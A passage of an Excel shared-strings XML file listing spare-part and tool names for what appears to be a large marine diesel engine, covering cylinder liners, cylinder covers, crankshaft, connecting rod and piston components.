    <t>SEAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF SEAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER CRANKCASE, Blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR SOLUTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTIVE CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME REAR SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME COUNTER COUPL.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME COUPLING SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELDCOUPL. SIDE UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING FOR CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD COUPL. SIDE LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING JACKET-INTERMEDI.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING CAP-CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shim, bearing-caMShaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-UPPER PART-FRONT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-LOWER PART-FRONT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-UPPER PART-REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-LOWER PART-REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-INTERMEDIATE FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORTING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD, CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-OIL SEPARATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAUTION PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAMEPLATE, MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING-UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL SEAL COVER-UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL SEAL COVER-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL THROW RING-RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX DOOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME DOOR-FRONT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME DOOR-REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKET  FOR SHIELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING DETAILS-GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD-LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SYNTHETIC RUBBER HOSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER W. RELIEF VALVE/SPLASH OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>O-ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Housing on coupling side</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Venting pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring seat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crankcase covering, relief valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crossbar with screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD, FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD END AFTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER F. CAMSHAFT HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER AIR CHAMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF SEALING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVERING ON FREE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE WITH FILLER PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOLAS COVERING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD INTERMEDIATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER ON REAR SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER F. GEAR WHEEL DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBULAR O-RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE COVER, FOR LIFTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER WITH SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.LINER-INTERMED.PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LINER-UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LINER-LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON CLEANING RING - RETROFIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST BELT Y56F</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Locking ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring for o-ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nikkel plating</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAME RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling ring, jacket-liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Strong back ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR SOLUTION - CYLINDER LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder Frame-Machining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END SHIELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING JACKET-UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stuffing box, cool.water conn.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING,NON-RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG FOR LIFTING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKET,CYL.FRAME-RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oilpan</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIAL NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting tool for cylinder liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR-HALF FOR CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRILL.TOOL, THREADS,LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING &amp; TILTING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR FOR GUIDE PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEAS.POINTS,CYL.LIN.TEMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEP RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISM.HEIGHT F.CYL. LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LINER COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder liner, mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER RING-Y56</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING-CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING SHIELD-UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING SHIELD-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER FOR GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD FOR FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME FOR CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD FOR CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Studs, exhaust valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD-EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Arr. of sleeve-fuel oil valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTIVE BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE FOR O-RING, FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sleeve, fuel oil valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Retaining ring, fuel valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING HOUSING,FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, FUEL GAS VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE, FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE-SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE FOR O-RING, ST.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Retaining ring, St. valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING HOUSING, ST. VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, STARTING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE, SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE FOR O-RING, SAFETY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Retaining ring, safety valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING HOUSING, SAFETY V.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Retaining ring, indicator bore</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING HOUSING, INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE IN AIR DUCT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET VALVE SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve seat bore, remachining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve seat ring, oversize</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SEAT RING-EXHAUST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.COV.UP.PART-TOP VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, INJECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.COVER TOP VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GLUE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. COVER TOP, REAR SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS VALVE DUMMY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE F.MOUNT.TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHT.GAUGE-CYL.COVER NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXT.STUD,LIFT CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder head, mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder head, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder head, assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder head, water tight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder head, machined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylinder head, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seal ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Quaertz installation in cyl. hea</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount. of water guide jacket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF THROTTLE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR SOLUTION,CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LTC RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Insert</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Finish mach. of cylinder cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD FOR CYLINDER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SEAT RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT FOR CYL. COVER STUDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REMACHINING OF CYL. COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. COVER, BOTTOM VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER, SIDE VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER, TOP VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SEAT RING, EXHAUST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SEAT RING INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. COVER, FRONT VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT+TURNING WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANK ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANK WEB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFTPIECE WITHOUT FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT PIECE W. THRUST CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERFLOW VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLSET DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL THROW RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE - MAIN BEARING CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOF FITTED BOLT SLEEVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOF FITTED BOLT SHANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOF FITTED BOLT HYDR.JACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydr. Jack -Crankshaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON FITTED BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HUB FOR GEAR WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEARWHEEL FOR CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOPSCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW FOR COUNTER WEIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VIBRATION DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crankshaft, machined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crankshaft, premachined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shim under connecting rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING ROD - REPAIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shim, crankpin bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING HOUSING-CRANKPIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAP, CRANKPIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shim, crosshead bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, BEARING HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST RING W.WHITE METAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT FOR CONN.ROD BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD BRG.SHELL-UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT FOR CONN.ROD STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD BEARING-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD BRG.SHELL-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR-HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL BLOCKING TOOL, X-HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SHOE EXTRACTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDING SHOE(TOOL)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT. ATTACHMENT-CONN.ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING TOOL,CRANK BRG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Retaining tool, telesco. pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT. TOOL, X-HEAD SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW FOR CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING ROD (BLANK)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston pin bush</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE FOR NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUSH FOR CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CASTLE NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREMACH. CONN. ROD BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREMACH. CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREMACH. CONN. ROD BEARING BODY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREMACH. CONN. ROD BEARING COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF CONN. ROD BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS. CONN. ROD SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN. ROD SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN. ROD BEARING, UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN. ROD BEARING, LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spacer plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nut for piston rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Safety device,  piston rod nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECURING FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-STUFFING BOX AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange, stuffing box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASE RING-SCRAPER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP COVER 2/2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASE RING-SEALING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORIFICE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide shoe, oscill. mass</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide shoe, additional mass</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE PIPE, PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket, support of crosshead</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting tool, crosshead</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON CROWN AND SKIRT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER F.COOLING INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston crown, Blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston crown, Semifinished</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston ring - Make specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston ring packet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIAL SHIM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bolt for piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL FOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAW FOR PISTON LIFT.TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE RING F. PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL-COOLING INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAW, PIST.RING EXPANDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISMTL.SCREW-PISTON SKIRT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXT.STUD, SUSP. PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT./PRESS.TEST TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pulling tool, stuffing box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
